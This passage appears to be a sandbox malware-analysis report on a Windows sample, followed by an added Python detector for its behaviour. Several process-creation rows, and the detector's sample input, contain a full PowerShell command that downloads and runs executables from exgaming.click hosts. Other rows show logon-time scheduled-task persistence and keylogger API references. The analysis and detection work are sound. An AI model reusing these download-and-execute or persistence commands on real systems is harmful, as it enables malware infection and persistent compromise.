                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6800 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe TID: 7112 | Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe TID: 2000 | Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe TID: 4824 | Thread sleep count: 6113 > 30
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe TID: 4824 | Thread sleep count: 3733 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5768 | Thread sleep count: 5031 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3668 | Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1996 | Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5364 | Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744 | Thread sleep count: 4756 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3012 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6524 | Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1816 | Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4448 | Thread sleep count: 5574 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5560 | Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748 | Thread sleep count: 4815 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5560 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4448 | Thread sleep count: 137 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684 | Thread sleep count: 5180 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684 | Thread sleep count: 1511 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848 | Thread sleep time: -3689348814741908s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416 | Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180 | Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1216 | Thread sleep count: 4930 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744 | Thread sleep count: 1968 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4448 | Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1996 | Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320 | Thread sleep count: 5318 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104 | Thread sleep count: 1689 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348 | Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300 | Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (3 identical entries)
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | File Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | File Volume queried: C:\ FullSizeInformation (2 identical entries)
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (24 identical entries)
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Thread delayed: delay time: 922337203685477 (2 identical entries)
                            Source: AntiMalware.exe, 00000012.00000002.4433952146.000000001DF50000.00000004.00000020.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4434584090.000000001E04A000.00000004.00000020.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4433398592.000000001C42E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Process information queried: ProcessInformation
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Process token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (12 identical entries)
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Process token adjusted: Debug (2 identical entries)
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Memory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            Source: Yara match | File source: amsi64_2108.amsi.csv, type: OTHER
                            Source: Yara match | File source: amsi64_4444.amsi.csv, type: OTHER
                            Source: Yara match | File source: amsi64_4204.amsi.csv, type: OTHER
                            Source: Yara match | File source: amsi64_2464.amsi.csv, type: OTHER
                            Source: Yara match | File source: amsi64_4408.amsi.csv, type: OTHER
                            Source: Yara match | File source: amsi64_5144.amsi.csv, type: OTHER
                            Source: ZzOTKK2V8l.exe, Keylogger.cs | Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                            Source: ZzOTKK2V8l.exe, DInvokeCore.cs | Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
                            Source: ZzOTKK2V8l.exe, AntiProcess.cs | Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp124D.tmp.bat""
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') (3 identical entries)
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe') (3 identical entries)
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe' (3 identical entries)
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe' (3 identical entries)
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"'
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 3
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\AntiMalware.exe "C:\Users\user\AppData\Roaming\AntiMalware.exe"
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit (2 identical entries)
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell (new-object system.net.webclient).downloadfile('http://xcu.exgaming.click', '%temp%\\expiorer.exe') & powershell (new-object system.net.webclient).downloadfile('http://xcu5.exgaming.click', '%temp%\\expliorer.exe') & powershell start-process -filepath '%temp%\\expiorer.exe' & powershell start-process -filepath '%temp%\\expliorer.exe' & exit (2 identical entries)
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell (new-object system.net.webclient).downloadfile('http://xcu.exgaming.click', '%temp%\\expiorer.exe') & powershell (new-object system.net.webclient).downloadfile('http://xcu5.exgaming.click', '%temp%\\expliorer.exe') & powershell start-process -filepath '%temp%\\expiorer.exe' & powershell start-process -filepath '%temp%\\expliorer.exe' & exit (4 identical entries)
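The process-creation rows above, read as a detection problem. The Python below is an added example and is not part of the Joe Sandbox report or of the sample's code: it embeds a few of the command lines quoted above as constructed input and flags three of the behaviours the report attributes to the sample, the PowerShell download-and-execute cradle (WebClient.DownloadFile followed by Start-Process on the same file), the schtasks persistence at logon with the highest run level, and dropped file names that imitate explorer.exe by swapping a capital I for a lowercase l. The list of imitated Windows binaries and the confusable-character map are the example's own assumptions, not something the report states.

```python
"""Triage helper for 'Process created' rows of a sandbox report.

Added example, not code from the Joe Sandbox report or from the sample.
Input is a list of (parent image, child command line) pairs.
"""
import re

# Constructed sample input: command lines quoted in the report above.
SAMPLE_EVENTS = [
    (r"C:\Users\user\Desktop\ZzOTKK2V8l.exe",
     r'''"C:\Windows\System32\cmd.exe" /c '''
     r'''powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & '''
     r'''powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & '''
     r'''powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & '''
     r'''powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit'''),
    (r"C:\Users\user\Desktop\ZzOTKK2V8l.exe",
     r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest '''
     r'''/tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit'''),
    (r"C:\Windows\System32\cmd.exe", "timeout 3"),
    (r"C:\Windows\System32\cmd.exe",
     r"powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'"),
]

DOWNLOAD_RE = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)
START_RE = re.compile(r"Start-Process\s+-FilePath\s+'([^']+)'", re.I)
SCHTASKS_RE = re.compile(r"schtasks\s+/create\b(.*)", re.I)

# Assumed list of Windows binaries whose names droppers imitate (example's own).
SYSTEM_BINARIES = sorted({"explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe",
                          "winlogon.exe", "services.exe", "rundll32.exe", "conhost.exe"})
# Assumed map of characters that pass for one another in common UI fonts.
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "|": "l", "0": "o"})


def norm_path(p):
    """Collapse the doubled backslashes of the quoted command lines and fold case."""
    return p.replace("\\\\", "\\").lower()


def basename(p):
    return p.replace("\\\\", "\\").rsplit("\\", 1)[-1]


def edit_distance(a, b):
    """Levenshtein distance by plain dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(path):
    """Return the Windows binary a file name imitates, or None.

    The name is folded through CONFUSABLES before comparison, so a capital I
    standing in for l is caught, and one extra or missing character is
    tolerated. A name that already equals the real binary is not a look-alike.
    """
    name = basename(path)
    folded = name.translate(CONFUSABLES).lower()
    for real in SYSTEM_BINARIES:
        if name.lower() != real and edit_distance(folded, real) <= 1:
            return real
    return None


def find_downloads(cmd):
    """(url, destination) pairs from WebClient.DownloadFile calls."""
    return DOWNLOAD_RE.findall(cmd)


def find_started(cmd):
    return START_RE.findall(cmd)


def _option(args, name):
    """Value of a schtasks /name option, whether 'quoted', "quoted" or bare."""
    m = re.search(rf"/{name}\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))", args, re.I)
    return next(v for v in m.groups() if v is not None) if m else None


def find_schtasks(cmd):
    """Describe a 'schtasks /create' persistence command, or return None."""
    m = SCHTASKS_RE.search(cmd)
    if not m:
        return None
    args = m.group(1)
    return {"name": _option(args, "tn"),
            "schedule": (_option(args, "sc") or "").lower(),
            "runlevel": (_option(args, "rl") or "").lower(),
            "target": (_option(args, "tr") or "").strip('"')}


def triage(events):
    """Return findings for a list of (parent image, command line) pairs."""
    findings, seen_names = [], set()
    for parent, cmd in events:
        downloads, started = find_downloads(cmd), find_started(cmd)
        # A cradle: the same file is fetched and launched from one command line.
        executed = {norm_path(d) for _, d in downloads} & {norm_path(p) for p in started}
        if executed:
            findings.append({"kind": "download_execute", "parent": parent,
                             "urls": [u for u, _ in downloads], "executed": sorted(executed)})
        task = find_schtasks(cmd)
        if task:
            findings.append({"kind": "scheduled_task", "parent": parent, **task})
        for path in [d for _, d in downloads] + started + ([task["target"]] if task else []):
            real, key = lookalike(path), basename(path).lower()
            if real and key not in seen_names:
                seen_names.add(key)
                findings.append({"kind": "lookalike_name", "path": path, "mimics": real})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The cradle check only fires when a path that was fetched is also launched from the same command line, which is exactly the shape of the cmd.exe line above; the separate per-powershell rows (one DownloadFile each, one Start-Process each) are caught by the look-alike name check instead, so both views of the chain produce a finding.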
                            Source: AntiMalware.exe, 00000012.00000002.4423691168.00000000036B7000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4423691168.00000000036FE000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4423691168.0000000003B27000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
                            Source: AntiMalware.exe, 00000012.00000002.4423691168.00000000036B7000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4423691168.00000000036FE000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4423691168.00000000036CA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager@
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe | Queries volume information: C:\Users\user\Desktop\ZzOTKK2V8l.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (19 identical entries)
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (5 identical entries)
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (4 identical entries)
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (4 identical entries)
                            Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe | Queries volume information: C:\Users\user\AppData\Roaming\AntiMalware.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeQueries volume information: C:\Users\user\AppData\Roaming\AntiMalware.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
